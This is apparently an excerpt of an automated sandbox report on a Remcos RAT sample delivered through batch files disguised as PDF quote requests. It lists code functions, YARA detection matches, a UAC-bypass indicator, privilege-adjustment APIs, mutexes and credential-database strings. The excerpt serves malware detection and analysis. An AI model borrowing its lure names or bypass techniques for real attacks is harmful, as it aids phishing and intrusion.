Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0040612B 47_2_0040612B
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0043E13D 47_2_0043E13D
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0044B188 47_2_0044B188
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_00442273 47_2_00442273
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0044D380 47_2_0044D380
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0044A5F0 47_2_0044A5F0
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_004125F6 47_2_004125F6
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_004065BF 47_2_004065BF
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_004086CB 47_2_004086CB
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_004066BC 47_2_004066BC
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0044D760 47_2_0044D760
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_00405A40 47_2_00405A40
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_00449A40 47_2_00449A40
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_00405AB1 47_2_00405AB1
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_00405B22 47_2_00405B22
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0044ABC0 47_2_0044ABC0
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_00405BB3 47_2_00405BB3
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_00417C60 47_2_00417C60
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0044CC70 47_2_0044CC70
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_00418CC9 47_2_00418CC9
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0044CDFB 47_2_0044CDFB
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0044CDA0 47_2_0044CDA0
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0044AE20 47_2_0044AE20
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_00415E3E 47_2_00415E3E
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_00437F3B 47_2_00437F3B
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_00405038 49_2_00405038
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_0041208C 49_2_0041208C
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_004050A9 49_2_004050A9
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_0040511A 49_2_0040511A
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_0043C13A 49_2_0043C13A
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_004051AB 49_2_004051AB
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_00449300 49_2_00449300
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_0040D322 49_2_0040D322
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_0044A4F0 49_2_0044A4F0
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_0043A5AB 49_2_0043A5AB
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_00413631 49_2_00413631
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_00446690 49_2_00446690
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_0044A730 49_2_0044A730
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_004398D8 49_2_004398D8
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_004498E0 49_2_004498E0
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_0044A886 49_2_0044A886
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_0043DA09 49_2_0043DA09
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_00438D5E 49_2_00438D5E
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_00449ED0 49_2_00449ED0
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_0041FE83 49_2_0041FE83
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_00430F54 49_2_00430F54
Source: C:\Windows\SysWOW64\recover.exe Code function: 53_2_004050C2 53_2_004050C2
Source: C:\Windows\SysWOW64\recover.exe Code function: 53_2_004014AB 53_2_004014AB
Source: C:\Windows\SysWOW64\recover.exe Code function: 53_2_00405133 53_2_00405133
Source: C:\Windows\SysWOW64\recover.exe Code function: 53_2_004051A4 53_2_004051A4
Source: C:\Windows\SysWOW64\recover.exe Code function: 53_2_00401246 53_2_00401246
Source: C:\Windows\SysWOW64\recover.exe Code function: 53_2_0040CA46 53_2_0040CA46
Source: C:\Windows\SysWOW64\recover.exe Code function: 53_2_00405235 53_2_00405235
Source: C:\Windows\SysWOW64\recover.exe Code function: 53_2_004032C8 53_2_004032C8
Source: C:\Windows\SysWOW64\recover.exe Code function: 53_2_00401689 53_2_00401689
Source: C:\Windows\SysWOW64\recover.exe Code function: 53_2_00402F60 53_2_00402F60
Source: C:\Users\Public\ANYDESK.PIF Code function: 60_2_02A220B4 60_2_02A220B4
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0042809D 62_2_0042809D
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0045412B 62_2_0045412B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_004421C0 62_2_004421C0
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_004281D7 62_2_004281D7
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0043E1E0 62_2_0043E1E0
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0041E29B 62_2_0041E29B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_004373DA 62_2_004373DA
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00438380 62_2_00438380
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00453472 62_2_00453472
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0042747E 62_2_0042747E
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0043E43D 62_2_0043E43D
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_004325A1 62_2_004325A1
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0043774C 62_2_0043774C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0041F809 62_2_0041F809
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_004379F6 62_2_004379F6
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_004279F5 62_2_004279F5
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0044DAD9 62_2_0044DAD9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00433C73 62_2_00433C73
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00413CA0 62_2_00413CA0
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00437CBD 62_2_00437CBD
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0043DD82 62_2_0043DD82
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00435F52 62_2_00435F52
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00437F78 62_2_00437F78
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0043DFB1 62_2_0043DFB1
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_06831143 62_2_06831143
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_06850697 62_2_06850697
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0686F2CB 62_2_0686F2CB
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0686920E 62_2_0686920E
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_06868268 62_2_06868268
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_06884300 62_2_06884300
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0685830C 62_2_0685830C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_068310BC 62_2_068310BC
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0687304E 62_2_0687304E
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_06859065 62_2_06859065
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0686F06E 62_2_0686F06E
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0684F129 62_2_0684F129
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0686EE3F 62_2_0686EE3F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_06858F2B 62_2_06858F2B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0686EC10 62_2_0686EC10
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_06864B01 62_2_06864B01
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_06858883 62_2_06858883
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\Public\alpha.pif B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
Found potential string decryption / allocating functions
Source: C:\Users\Public\ANYDESK.PIF Code function: String function: 02A24414 appears 154 times
Source: C:\Users\Public\ANYDESK.PIF Code function: String function: 02B0457C appears 835 times
Source: C:\Users\Public\ANYDESK.PIF Code function: String function: 02B0421C appears 64 times
Source: C:\Users\Public\ANYDESK.PIF Code function: String function: 02A33E20 appears 48 times
Source: C:\Users\Public\ANYDESK.PIF Code function: String function: 02B13E9C appears 45 times
Source: C:\Users\Public\ANYDESK.PIF Code function: String function: 02B04414 appears 246 times
Source: C:\Users\Public\ANYDESK.PIF Code function: String function: 02A2457C appears 570 times
Source: C:\Users\Public\ANYDESK.PIF Code function: String function: 02B13E20 appears 54 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 004351E0 appears 55 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 0686595D appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 06832FA5 appears 37 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 00434ACF appears 43 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 0686606E appears 46 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 00401F96 appears 49 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 00401EBF appears 32 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 00402117 appears 39 times
Source: C:\Windows\SysWOW64\recover.exe Code function: String function: 0044DDB0 appears 33 times
Source: C:\Windows\SysWOW64\recover.exe Code function: String function: 00418555 appears 34 times
Source: C:\Windows\SysWOW64\recover.exe Code function: String function: 004186B6 appears 58 times
Source: C:\Windows\SysWOW64\recover.exe Code function: String function: 004188FE appears 88 times
Source: C:\Windows\SysWOW64\recover.exe Code function: String function: 00422297 appears 42 times
Source: C:\Windows\SysWOW64\recover.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\SysWOW64\recover.exe Code function: String function: 00413025 appears 79 times
Yara signature match
Source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: SndVol.exe PID: 6808, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.rans.phis.troj.spyw.expl.evad.winZIP@93/32@3/4
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0041A225 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free, 47_2_0041A225
Source: C:\Windows\SysWOW64\recover.exe Code function: 53_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle, 53_2_00410DE1
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00417AD9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 62_2_00417AD9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_06848967 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 62_2_06848967
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B0793A GetDiskFreeSpaceA, 26_2_02B0793A
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B16760 CreateToolhelp32Snapshot, 26_2_02B16760
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_00416A46 FindResourceW,SizeofResource,LoadResource,LockResource, 47_2_00416A46
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 62_2_0041AC43
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\expha.pif Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe Mutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1416:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2168:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_03
Source: C:\Windows\SysWOW64\colorcpl.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-14MUP4
Source: C:\Windows\SysWOW64\recover.exe File created: C:\Users\user\AppData\Local\Temp\bhv3B03.tmp
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "
Source: C:\Users\Public\ANYDESK.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\ANYDESK.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\recover.exe System information queried: HandleInformation
Source: C:\Users\Public\rdha.pif File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: colorcpl.exe, 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088234273.000000000319E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088600651.000000002F10D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2090923799.000000002EE7B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2135181141.000000002EF63000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000002F.00000002.2132072281.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: recover.exe, recover.exe, 00000031.00000002.2094721987.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: colorcpl.exe, 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088234273.000000000319E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088600651.000000002F10D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2090923799.000000002EE7B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2135181141.000000002EF63000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000002F.00000002.2132072281.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: colorcpl.exe, 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088234273.000000000319E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088600651.000000002F10D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2090923799.000000002EE7B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2135181141.000000002EF63000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000002F.00000002.2132072281.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: colorcpl.exe, 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088234273.000000000319E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088600651.000000002F10D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2090923799.000000002EE7B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2135181141.000000002EF63000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000002F.00000002.2132072281.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: colorcpl.exe, 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088234273.000000000319E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088600651.000000002F10D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2090923799.000000002EE7B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2135181141.000000002EF63000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000002F.00000002.2132072281.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: recover.exe, 0000002F.00000003.2129375125.0000000002F43000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: colorcpl.exe, 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088234273.000000000319E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088600651.000000002F10D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2090923799.000000002EE7B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2135181141.000000002EF63000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000002F.00000002.2132072281.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Windows\SysWOW64\recover.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "
